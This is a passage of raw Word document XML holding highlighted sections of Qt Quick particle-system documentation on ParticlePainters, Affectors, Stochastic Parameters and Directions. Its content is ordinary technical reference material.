      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="781" w:name="particlepainters"/>
      <w:bookmarkStart w:id="782" w:name="_Toc483000696"/>
      <w:bookmarkStart w:id="783" w:name="_Toc483003713"/>
      <w:bookmarkStart w:id="784" w:name="_Toc483604048"/>
      <w:bookmarkStart w:id="785" w:name="_Toc483605268"/>
      <w:bookmarkEnd w:id="781"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ParticlePainters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="782"/>
      <w:bookmarkEnd w:id="783"/>
      <w:bookmarkEnd w:id="784"/>
      <w:bookmarkEnd w:id="785"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Painters are the types that </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visualize logical particles</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For each logical particle in the groups assigned to it, which are within its </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bounds</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or outside, if you do not set the </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clip</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> property on the type) it will be visualized in a </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manner</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependent on the type of</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId582" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base type</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId583" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does not draw anything.</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId584" w:history="1">
        <w:r w:rsidRPr="0061520D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ImageParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>renders an image at the particle location.</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId585" w:history="1">
        <w:r w:rsidRPr="0061520D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CustomParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows you to write your own shaders to render the particles, passing in the logical particle state as vertex data.</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId586" w:history="1">
        <w:r w:rsidRPr="0061520D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ItemParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows you to visualize logical particles using arbitrary QML delegates. </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ModelParticle</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is similar, but coordinates model data amongst the delegates in a similar manner to the view classes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>As the</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId587" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParticlePainter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is the QML type visualizing the particles in the scene, it is its </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Z value</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is important when trying to place particles above or below other types visually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="786" w:name="affectors"/>
      <w:bookmarkStart w:id="787" w:name="_Toc483000697"/>
      <w:bookmarkStart w:id="788" w:name="_Toc483003714"/>
      <w:bookmarkStart w:id="789" w:name="_Toc483604049"/>
      <w:bookmarkStart w:id="790" w:name="_Toc483605269"/>
      <w:bookmarkEnd w:id="786"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affectors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="787"/>
      <w:bookmarkEnd w:id="788"/>
      <w:bookmarkEnd w:id="789"/>
      <w:bookmarkEnd w:id="790"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="0061520D" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Affectors are an </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optional</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> component of a particle system. They can perform a variety of </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manipulations to the simulation</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, such as altering the trajectory of particles or prematurely ending their life in the simulation. For performance reasons, it is recommended not to use Affectors in high-volume particle systems.</w:t>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0061520D" w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="004375A9" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="791" w:name="stochastic-parameters"/>
      <w:bookmarkStart w:id="792" w:name="_Toc483000698"/>
      <w:bookmarkStart w:id="793" w:name="_Toc483003715"/>
      <w:bookmarkStart w:id="794" w:name="_Toc483604050"/>
      <w:bookmarkStart w:id="795" w:name="_Toc483605270"/>
      <w:bookmarkEnd w:id="791"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stochastic Parameters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="792"/>
      <w:bookmarkEnd w:id="793"/>
      <w:bookmarkEnd w:id="794"/>
      <w:bookmarkEnd w:id="795"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="0061520D" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As particle systems benefit from </w:t>
      </w:r>
      <w:r w:rsidRPr="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stochastic control</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of parameters across a large number of instances, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>several stochastic helper types</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used by the particle system. If you do not wish to have any stochastic variation in these parameters, then do not specify any variation in these types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="004375A9" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="796" w:name="directions"/>
      <w:bookmarkStart w:id="797" w:name="_Toc483000699"/>
      <w:bookmarkStart w:id="798" w:name="_Toc483003716"/>
      <w:bookmarkStart w:id="799" w:name="_Toc483604051"/>
      <w:bookmarkStart w:id="800" w:name="_Toc483605271"/>
      <w:bookmarkEnd w:id="796"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Directions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="797"/>
      <w:bookmarkEnd w:id="798"/>
      <w:bookmarkEnd w:id="799"/>
      <w:bookmarkEnd w:id="800"/>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="00E51DF3" w:rsidRDefault="008573B7" w:rsidP="008573B7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Directions can be specified by </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>angle</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>magnitude</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or by </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> components. While any direction can be specified with either method, there is a significant </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>difference</w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between varying the x and y components and varying the angle and magnitude. Varying the x and y components will lead to a rectangular area around the specified point, while varying the angle will lead to an arc centered on the specified point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008573B7" w:rsidRPr="008573B7" w:rsidRDefault="008573B7" w:rsidP="005E64B4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="801" w:name="shapes"/>
      <w:bookmarkStart w:id="802" w:name="_Toc483000700"/>
      <w:bookmarkStart w:id="803" w:name="_Toc483003717"/>
      <w:bookmarkStart w:id="804" w:name="_Toc483604052"/>
      <w:bookmarkStart w:id="805" w:name="_Toc483605272"/>
      <w:bookmarkEnd w:id="801"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
